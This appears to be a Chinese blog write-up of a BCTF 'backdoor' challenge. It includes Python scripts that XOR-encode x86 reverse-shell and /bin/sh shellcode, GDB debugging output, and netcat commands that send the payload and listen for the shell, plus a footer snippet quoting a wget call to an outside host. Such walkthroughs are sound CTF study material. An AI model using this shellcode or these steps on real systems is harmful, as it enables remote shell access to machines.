linux-溢出程序

最新推荐文章于 2023-12-21 22:48:02 发布
最新推荐文章于 2023-12-21 22:48:02 发布
阅读量694 收藏
点赞数
分类专栏: ctf LINUX 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/24458399
版权

后门程序: 100

描述

米特尼克拿到了BAT数据中心的口令后,为了确保口令被更改后仍能登陆数据中心,他从一位小伙伴那拿到了一个后门程序植入进了服务器。这个后门程序没有任何说明,但是米特尼克迅速找到了使用方法。后门程序:http://bctf.cn/files/downloads/backdoor_844d899c6320ac74a471e3c0db5e902e 安装地址:218.2.197.250:1337 安装地址2:218.2.197.249:1337

题目放出很久才写,哎················


程序  流程为  输入 字符串 然后与 <baidu-rocks,froM-china-with-love> 异或  与  n0b4ckd00   相等  那么直接执行  str+0xa后面的 代码





首先  这个程序   0xb  无法被 scanf 读入 导致后面的数据被截断

在EDB中查看:



缺点是  无法  加入  参数  所以一般都不用·····················


在GDB 中 可以加入 参数 并且可以下断 调试  查看堆栈等

PYHTON POC1:

shellcode  用  http://shell-storm.org/shellcode/files/shellcode-849.php  (后面用一个更简单的)

from itertools import izip, cycle
# izip('ABCD', 'xy') --> Ax By
# cycle('ABCD') --> A B C D A B C D A B C D ...

#ipaddr 10.16.2.28
#port 31337 (7a69)
#ipaddr='\x10\x10\x02\x1c'
#port = '7a\x69'

shellcode = (
'\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
'\xb0\x66\xb3\x01\x51\x6a\x06\x6a'
'\x01\x6a\x02\x89\xe1\xcd\x80\x89'
'\xc6\xb0\x66\x31\xdb\xb3\x02\x68'
#ipaddr
'\x0a\x10\x02\x1c'
'\x66\x68'
#port
'\x7a\x69'
'\x66\x53\xfe'
'\xc3\x89\xe1'
'\x6a\x10\x51\x56\x89'
'\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
'\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
'\xc0\x52\x68\x6e\x2f\x73\x68'
'\x68'
'\x2f\x2f\x62\x69\x89\xe3\x52\x53'
'\x89\xe1\x52\x89\xe2\xb0\x0b\xcd'
'\x80')

bd = '<baidu-rocks,froM-china-with-love>'

data = 'n0b4ckd00r' + shellcode + '\n'

xordata =''
for i in range(len(data)):
	xordata += chr( ord( bd[i%len(bd)] ) ^ ord(data[i]) )

open('payload.txt','wb').write(xordata)

import binascii
print repr(binascii.hexlify(xordata))


x0b  


GDB 命令学习:

 		* info frame :显示当前栈帧的详细信息。
		如要查看所有的gdb命令,可以在gdb下键入两次Tab(制表符)
             	xbreak   在当前函数的退出的点上设置一个断点
 		step 跟入函数
  		next 不跟入函数
    		bt Backtrace: 显示程序堆栈信息
(gdb) x/20i $eip    查看EIP
=> 0x8048c00:   push   %ebx
   0x8048c01:   sub    $0x28,%esp
   0x8048c04:   mov    %gs:0x14,%eax
   0x8048c0a:   mov    %eax,0x1c(%esp)
   0x8048c0e:   xor    %eax,%eax
   0x8048c10:   lea    0x13(%esp),%edx
   0x8048c14:   lea    0x1b(%esp),%eax
   0x8048c18:   movb   $0x0,(%eax)
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
  t(binary), f(float), a(address), i(instruction), c(char) and s(string).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).



GDB 中 对  0x08048e10  下断:


(gdb) file backdoor_844d899c6320ac74a471e3c0db5e902e 

(gdb) r < payload.txt 

break *0x08048e10

(gdb) x/200bx *(int*)($ebp+8)
0xbffff2a8:     0x52    0x52    0x03    0x5d    0x07    0x1e    0x49    0x42
0xbffff2b0:     0x5f     0x11    0x5a    0xb3    0x1d    0xbd    0x43    0xa6
0xbffff2b8:     0x7c    0xff      0xd3    0x0e    0xda    0x6f    0x30    0x47
0xbffff2c0:     0x71    0x03    0x75    0x02    0x2f    0xe5    0x8e    0xbb
0xbffff2c8:     0xe5    0xb7    0xfa     0xd2    0x07    0x58    0xbf    0xc6
0xbffff2d0:     0x2f     0x1a    0x7f     0x73    0x69    0x6f    0x4a    0x0e
0xbffff2d8:     0x08    0x06    0x2b    0x7e    0x9d    0xab    0xe0    0x8f
0xbffff2e0:     0x00    0x10    0xff      0xb7    0xc0    0x8a    0x04    0x08 
0xbffff2e8:     0x01    0x00    0x00    0x00    0xa2    0x8f    0x04    0x08
0xbffff2f0:      0x01    0x00    0x00    0x00    0xc4    0xf3    0xff    0xbf
0xbffff2f8:      0xcc    0xf3     0xff      0xbf    0x18    0xf3    0xff    0xbf
0xbffff300:     0xa5    0xc4    0xd8    0xb7    0x30    0x10    0xff    0xb7
0xbffff308:     0x5b    0x8f     0x04    0x08    0x01    0x00    0x00    0x00
0xbffff310:     0x50    0x8f     0x04    0x08    0x00    0x00    0x00    0x00
0xbffff318:     0x98    0xf3     0xff      0xbf    0xd6    0x3b    0xd7    0xb7
0xbffff320:     0x01    0x00    0x00    0x00    0xc4    0xf3    0xff    0xbf
0xbffff328:     0xcc    0xf3     0xff     0xbf    0x00    0x70    0xeb    0xb7
0xbffff330:     0x80    0xf3     0xff     0xbf    0xff    0xff    0xff    0xff
0xbffff338:     0xf4     0xef     0xff     0xb7    0xf4    0x86    0x04    0x08
0xbffff340:     0x01    0x00    0x00    0x00    0x80    0xf3    0xff    0xbf
0xbffff348:     0x26    0x06    0xff    0xb7    0xb0    0xfa    0xff    0xb7
0xbffff350:     0x48    0x76    0xeb    0xb7    0xf4    0x2f    0xeb    0xb7
0xbffff358:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbffff360:     0x98    0xf3     0xff    0xbf    0x18    0x79    0x46    0xa0
0xbffff368:     0x08    0x0f     0xd7    0xf1    0x00    0x00    0x00    0x00


可以看到 堆栈被破坏了  构造的shellcode不能运行

接着我们  在适合的地方+ ‘\x90’

shellcode 结构如下:

 8048060:       31 c0                   xor    eax,eax
 8048062:       31 db                   xor    ebx,ebx
 8048064:       31 c9                   xor    ecx,ecx
 8048066:       31 d2                   xor    edx,edx
 8048068:       b0 66                   mov    al,0x66
 804806a:       b3 01                   mov    bl,0x1
 804806c:       51                      push   ecx
 804806d:       6a 06                   push   0x6
 804806f:       6a 01                   push   0x1
 8048071:       6a 02                   push   0x2
 8048073:       89 e1                   mov    ecx,esp
 8048075:       cd 80                   int    0x80
 8048077:       89 c6                   mov    esi,eax
 8048079:       b0 66                   mov    al,0x66
 804807b:       31 db                   xor    ebx,ebx
 804807d:       b3 02                   mov    bl,0x2
 804807f:       68 c0 a8 01 0a          push   0xa01a8c0
 8048084:       66 68 7a 69             pushw  0x697a
 8048088:       66 53                   push   bx
 804808a:       fe c3                   inc    bl
 804808c:       89 e1                   mov    ecx,esp
 804808e:       6a 10                   push   0x10
 8048090:       51                      push   ecx
 8048091:       56                      push   esi
 8048092:       89 e1                   mov    ecx,esp
 8048094:       cd 80                   int    0x80
 8048096:       31 c9                   xor    ecx,ecx
 8048098:       b1 03                   mov    cl,0x3
0804809a <dupfd>:
 804809a:       fe c9                   dec    cl
 804809c:       b0 3f                   mov    al,0x3f
 804809e:       cd 80                   int    0x80
 80480a0:       75 f8                   jne    804809a
 80480a2:       31 c0                   xor    eax,eax
 80480a4:       52                      push   edx
 80480a5:       68 6e 2f 73 68          push   0x68732f6e
 80480aa:       68 2f 2f 62 69          push   0x69622f2f
 80480af:       89 e3                   mov    ebx,esp
 80480b1:       52                      push   edx
 80480b2:       53                      push   ebx
 80480b3:       89 e1                   mov    ecx,esp
 80480b5:       52                      push   edx
 80480b6:       89 e2                   mov    edx,esp
 80480b8:       b0 0b                   mov    al,0xb
 80480ba:       cd 80                   int    0x80
下面在合适的地方增加    '\x90' 

```````````````````````````
'\x66\x53\xfe'
'\xc3\x89\xe1' +'\x90'//
'\x6a\x10\x51\x56\x89'
'\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
'\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
'\xc0\x52\x68\x6e\x2f\x73\x68' + '\x90\x90\x90'
```````````````````````````
gdb调试可以看到 scanf 全部输入了



接下来:

nc 218.2.197.250 1337 < payload.txt 

nc -lvp 31337

本地测试图

即可获得shell   cat /home/ctf/flag

PYHTON POC2:

'''
00401120 >    90            nop
00401121      90            nop
00401122      90            nop
00401123      31C0          xor eax,eax
00401125      50            push eax
00401126      68 2F2F7368   push 0x68732F2F
0040112B      68 2F62696E   push 0x6E69622F
00401130      89E3          mov ebx,esp
00401132      50            push eax
00401133      53            push ebx
00401134      89E1          mov ecx,esp
00401136      B0 0B         mov al,0xB
00401138      CD 80         int 0x80
'''
shellcode = (
"\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F"
"\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3"
"\x50\x53\x89\xE1\xB0\x0B\xCD\x80")

bd = '<baidu-rocks,froM-china-with-love>'

data = 'n0b4ckd00r' + shellcode + '\n'

xordata =''
for i in range(len(data)):
	xordata += chr( ord( bd[i%len(bd)] ) ^ ord(data[i]) )

open('payload.txt','wb').write(xordata)

import binascii
print repr(binascii.hexlify(xordata))























pandamac
关注
专栏目录
linux本地自动溢出获取root权限工具
瞎几把学
11-26 1249
清理了一些连接因为不能访问,或者清除了我的连接的。。。。。留言的连接我已经做好了! 下面应该是是某个国外黑客溢出用的 http://safilooptics.ge/tmp/aa.txt   [python] view plaincopyprint? {  system("wget http://standproje.com/modules/mod_footer/
中级课程——SSRF
hk_hkl的博客
07-15 318
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言挖掘 前言 挖掘
Web漏洞-SSRF漏洞(详细)
Ays.Ie的博客
03-10 3056
该篇为Web漏洞-SSRF漏洞(详细)
SSRF漏洞原理攻击与防御(超详细总结)
热门推荐
hello
04-09 6万+
SSRF漏洞原理攻击与防御 目录 CSRF漏洞原理攻击与防御一、SSRF是什么?二、SSRF漏洞原理三、SSRF漏洞挖掘四、产生SSRF漏洞的函数五、SSRF中URL的伪协议六、SSRF漏洞利用(危害)七、SSRF绕过方式八、SSRF漏防御 提示:以下是本篇文章正文内容,下面案例可供参考 一、SSRF是什么? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系
对Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
最新发布
weixin_72849553的博客
12-21 3136
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
jdk-8u321-linux-aarch64.tar.gz
01-22
这包括监控JVM性能(通过jstat、jmap、jstack等工具)、调整JVM参数(如-Xms、-Xmx、-XX:MaxHeapSize等)以及处理常见的内存溢出问题。此外,JDK 8u321还包括了安全性更新和性能优化,因此定期升级到最新版本对于...
应用-Valgrind-发现-Linux-程序的内存问题.doc
03-01
Valgrind 是一款强大的Linux内存调试工具,特别适用于检测程序中的内存管理问题,如内存泄漏、非法内存访问等。在Linux运维和服务器管理中,它是一个不可或缺的实用工具,可以帮助开发者和运维人员找出那些难以通过...
Linux-UNIX系统编程手册(上册)1
08-03
4. 编写安全的程序:学习避免常见的安全漏洞,如缓冲区溢出、权限问题等。 5. 使用POSIX线程编写多线程程序:理解线程的创建、同步、通信和销毁,如pthread库的使用。 6. 构建和使用共享库:掌握动态链接库的创建和...
jdk8 jdk-8u251-linux-x64 网盘下载
04-24
7. **并行流**:并行流能够充分利用多核处理器的优势,提升程序性能。通过使用并行流,开发者无需过多关注线程管理,即可享受多线程带来的性能提升。 #### 三、Linux环境下安装JDK 8 的步骤 1. **下载JDK 8 安装包...
Python库 | frida-14.2.18-py3.8-linux-i686.egg
02-21
**Python库Frida简介** ...总之,`frida-14.2.18-py3.8-linux-i686.egg`是一个强大的工具,为开发者提供了在Linux环境下深入理解和控制程序的能力,是Python开发人员在进行后端和运维工作时的有力助手。
nc具体用法
嘻嘻哈哈
01-24 7373
nc简介 1、nc nc全称netcat,又叫做瑞士军刀,是一款简单、可靠的网络工具 2、nc的作用 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 端口扫描,nc可以作为client发起TCP或UDP连接 机器之间传输文件 机器之间网络测速 3、常用参数 -l:用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作s
SSRF在有无回显方面的利用及其思考与总结
weixin_50464560的博客
05-16 5767
​ 对于SSRF的利用、危害及绕过[MisakiKata ]师傅先知上的的一文介绍的非常详细,看了这篇文章也学到了很多。由于在实际场景中还遇到很多类似SSRF的点,所以还想深入探讨一下其他利用方式以及无回显情况下的SSRF。 1.一般层面(有回显)SSRF及bypass利用技巧 可能存在SSRF的URL: http://www.xxx.com/vul.php?url=http://www.xxc.com/xxx.jpg http://share.xxx.com/index.php?url=htt
SSRF漏洞详解
qq_48904485的博客
03-22 2万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9153
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
SSRF中的URL的伪协议
m0_55754984的博客
09-10 2132
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议 0x01 类型 file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统中获取文件: http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器
20210226web渗透学习之SSRF总结
qq_45290991的博客
05-26 1241
翻译作者:国勇(信安之路特约作者) 原文地址:https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 SSRF 是什么 服务器端请求伪造(SSRF)是指攻击者能够通过存在漏洞的 web 应用程序发送黑客制造的请求 简单来说,黑客可以告诉服务器一个网址,服务器负责去请求这个网址。 例如: GET /?url=http://google.com/H
linux命令——nc
weixin_34146805的博客
11-12 524
nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在渗透中经常用于反弹shell,用于交互式执行shell,或者用于提权! 基本使用语法: 1 nc选项IPport 基本参数说明: 1 2...
java程序造成Linux内存溢出
07-08
在Java程序中,内存溢出(OutOfMemoryError)通常有以下几种情况: 1. 堆内存溢出:Java堆用于存储程序运行时创建的对象。如果堆内存不足以容纳新创建的对象,就会导致堆内存溢出。可以通过增加堆内存大小(-Xmx...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值